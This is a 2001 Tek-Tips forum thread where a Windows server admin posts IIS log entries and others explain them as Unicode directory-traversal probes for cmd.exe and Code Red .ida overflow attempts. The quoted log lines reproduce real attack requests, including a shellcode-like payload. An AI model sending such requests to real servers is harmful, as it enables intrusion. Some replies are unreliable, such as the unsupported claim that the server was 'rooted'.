Strange log entries..

[NightWatcher]

Hi..
I have attached part of my IIS log file, which is a bit strange..
Can anyone help me to understand, what happend.

----------------------------------------
2001-07-22 09:02:20 202.207.144.6 - 000.000.000.000 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 502 -
2001-07-22 09:02:20 202.207.144.6 - 000.000.000.000 80 GET /scripts/..\../winnt/system32/cmd.exe /c+dir 502 -
2001-07-22 09:02:22 202.207.144.6 - 000.000.000.000 80 GET /scripts/..Á%pc../winnt/system32/cmd.exe /c+dir 500 -
2001-07-22 09:02:22 202.207.144.6 - 000.000.000.000 80 GET /scripts/..À%9v../winnt/system32/cmd.exe /c+dir 500 -
2001-07-22 09:02:25 202.207.144.6 - 000.000.000.000 80 GET /scripts/..À%qf../winnt/system32/cmd.exe /c+dir 500 -
2001-07-22 09:02:29 202.207.144.6 - 000.000.000.000 80 GET /scripts/..Á%8s../winnt/system32/cmd.exe /c+dir 500 -
2001-07-22 09:02:29 202.207.144.6 - 000.000.000.000 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2001-07-22 09:02:31 202.207.144.6 - 000.000.000.000 80 GET /scripts/..\../winnt/system32/cmd.exe /c+dir 502 -
2001-07-22 09:02:35 202.207.144.6 - 000.000.000.000 80 GET /scripts/..o../winnt/system32/cmd.exe /c+dir 404 -
2001-07-22 09:02:40 202.207.144.6 - 000.000.000.000 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 502 -
2001-07-22 09:02:44 202.207.144.6 - 000.000.000.000 80 GET /scripts/..ð€€¯../winnt/system32/cmd.exe /c+dir 404 -
2001-07-22 09:02:49 202.207.144.6 - 000.000.000.000 80 GET /scripts/..ø€€€¯../winnt/system32/cmd.exe /c+dir 404 -
2001-07-22 09:02:50 202.207.144.6 - 000.000.000.000 80 GET /scripts/..ü€€€€¯../winnt/system32/cmd.exe /c+dir 404 -
2001-07-22 09:02:55 202.207.144.6 - 000.000.000.000 80 GET /msadc/../../../../../../winnt/system32/cmd.exe /c+dir 403 -
----------------------------------------

The 000.000.000.000 is where my IP was.
What was it that they were trying to do?
And, did they susceeded?

Thank you.


NightWatcher

 

[Guest_imported]

looks like you got rooted

 

[NightWatcher]

Can you be more specific?

Appreciate it.


NightWatcher

 

[Guest_imported]

It seems that port 80 was targeted, perhaps not by a hacker, but perhaps by the Red Worm. For information see microsofts site or any of the anti-virus sites.

 

[NightWatcher]

The Red Worm, is the one that changes the default page to '... hacked by chinese' isn't it?
If so, I have no such page modification.
I have just realised, that the logs have a number, by the end of each sentence that denotes the action, and all actions in my case were either denied, or not found, so I should be OK..

Thank you.


NightWatcher

 

[DigitZero]

This is not the Chinese Code Red Worm. The Code Red worm exploits a vulnerability in the IIS idq.dll file through .idq and .ida files. The above mentioned logs represent a hacker scan on your system for the IIS unicode or IIS encode/decode vulnerability.

It seems by the above mentioned logs that luckly the hacker was not able to exploit your host. The errors shown above are described as follows:

IIS 404 error = File not found
IIS 403 error = Access Denied
IIS 500 error = Interner Server Error
IIS 502 error = Bad Gateway

These errors and the logs represent that the hacker was not able to succeed. I am not 100% sure as you have only pasted a part of your logs. If they are the only strange lines in your logs, then your system has not been compromised. Though its recommended that you download the latest security patches from the Microsoft web site.

DigitZero

"if you cant stand the heat, better stay out of the kitchen"

 

[NightWatcher]

Thanks..

Yes, those were the only strange lines in the log.

I have not and will not apply any MS patches, as they screw my system up, and I don't want to reinstall Win2KServer again. I also know that some people are imune to the side effects of those patches, so as a generalized rule the best thing to most people is to apply MS patches.

Someone just told me about the '.idc', that CodeRed uses, I thought that CodeRed only exploits '.ida' and '.idq', can you shed some light on this?

Thanks


NightWatcher

 

[iSeriesCodePoet]

Visit this site (

http://www.cert.org/archive/html/coderedannounce.html),

I know M$ may not always have top quality patches but this one is important. You may be fine yet, but as Steve Gibson on

http://grc.com/codered/codered.htm

says, Microsoft actually sees this as a threat, and it is morphing. The really bad part is is that it will be around for a long time now... Mike Wills
RPG Programmer

"I am bad at math because God forgot to include math.h into my programming!"

Please let us (Tek-Tips members) know if the solutions I provide are helpful to you. Not only do my posts help you but they may help others.

 

[NightWatcher]

Thanks.

I have just been visited by a WORM, can anyone tell me what the log is saying:

2001-08-01 13:44:07 208.36.124.212 - 0.0.0.0 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 404 2

http://www.worm.com

- -
2001-08-01 14:31:01 217.0.175.67 - 0.0.0.0 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 404 2

http://www.worm.com

- -
2001-08-01 14:35:11 195.112.16.172 - 0.0.0.0 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 404 2

http://www.worm.com

- -
2001-08-01 14:42:03 202.108.221.82 - 0.0.0.0 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 404 2

http://www.worm.com

- -

If this was CODE RED, I believe I'm not infected, the home page is still the same..

Thank you.


NightWatcher

 

[iSeriesCodePoet]

I don't think code red changes any of your pages...it just sits in memory and sucks up bandwidth searching for its next victim. Mike Wills
RPG Programmer

"I am bad at math because God forgot to include math.h into my programming!"

Please let us (Tek-Tips members) know if the solutions I provide are helpful to you. Not only do my posts help you but they may help others.

 

[NightWatcher]

Thanks, that was fast..

Yeah, isn't CODE RED the one that changes the 'default.htm' to something like 'hacked by chinese'??
I think so, at least that's what most pages about CODE RED say.. Anyway, I have restarted the server, which I think will remove the worm from memory..
Correct me if I'm wrong.

Thank you.


NightWatcher

 

[iSeriesCodePoet]

Okay...my bad...just read the details on it on

http://www.symantec.com/avcenter/venc/data/codered.worm.html

I just never heard all of what it does. I would still try to take that percaution of patching to avoid that worm. It will be out for a while yet due to improper date and time settings. Mike Wills
RPG Programmer

"I am bad at math because God forgot to include math.h into my programming!"

Please let us (Tek-Tips members) know if the solutions I provide are helpful to you. Not only do my posts help you but they may help others.

 

[Guest_imported]

NightWatcher. please apply the patch for codered. each time you receive a GET defualt.ida xxxxxxxxxxxx... you will be re-infected. you will in turn be sending that same command out to others. If the hacker were to of executed these IIS server gets at the right time, he may have opened a CMD prompt in the hart of your system directory. then any console command can be use.... even the 'net' command. One more thing. The code red worm no longer defaces your defult.xxx and index.xxx web files.

-vandeler

 

[parasite]

In my Apache-logfiles (windows) the "default.ida" is missing. how can i have it back. (note: I'm not infected by the codered-worm, i already patched and installed the server a few days ago)

Thank you

Nicolas

 

[ntsux]

Best solution is to drop NT and adopt Linux..

 

[Guest_imported]

That's the new Limba Worm. The infection algorithm it uses are unknown I think or has anyone ever seen them before?

The Worm seems to spread out very fast on IIS systems, my logfiles are full of infection attempts. The worm also seems to spread via javascript on IE, self-opening attachments via Outlook and some yet unkown methods using windows network sharing, according to Heise (

http://www.heise.de)

It can't infect Apache servers of course.

 

[Guest_imported]

Yeah, the best patche for that is availlable at

http://www.redhat.com

You'll have to format everything, and learn Linux, but it worth.
I have Linux and I am laughing as I see many futiles attacks from thoses NT worms against my machine.
(But, Linux is vulerable too if you never upgrade, so don't forget to visit redhat.com once per week for upgrades(or subscribe to use their automatics upgrades tools))

 

[squasher]

I'm getting these same entries in my logs daily. Lots of them. A month ago I was getting Code Red entires...up to 300 a day at peak...now these. Code Red has died down to just a few ( relative ) a day. I've just started researching this. The ip's that they are coming from have been compromised and are randomly ( l believe ) generating the ip's in search of IIS 4.0/5.0 that are vulnerable ( ie not patched ). This is not unlike the Code Red generator. Another interesting note here....when I hit port 80 on the compromised ip ( after a scan to see if a web server is running at that ip ) the "GET" command or request for the default web page at that location is followed by a prompt on my local machine that I have elected to download a file from that server....ofcourse, this is not the case and the file has got to be the compromising executable or script...The name of the file has been constant...I'll hunt it down again tonight and post the name as workload/time permits.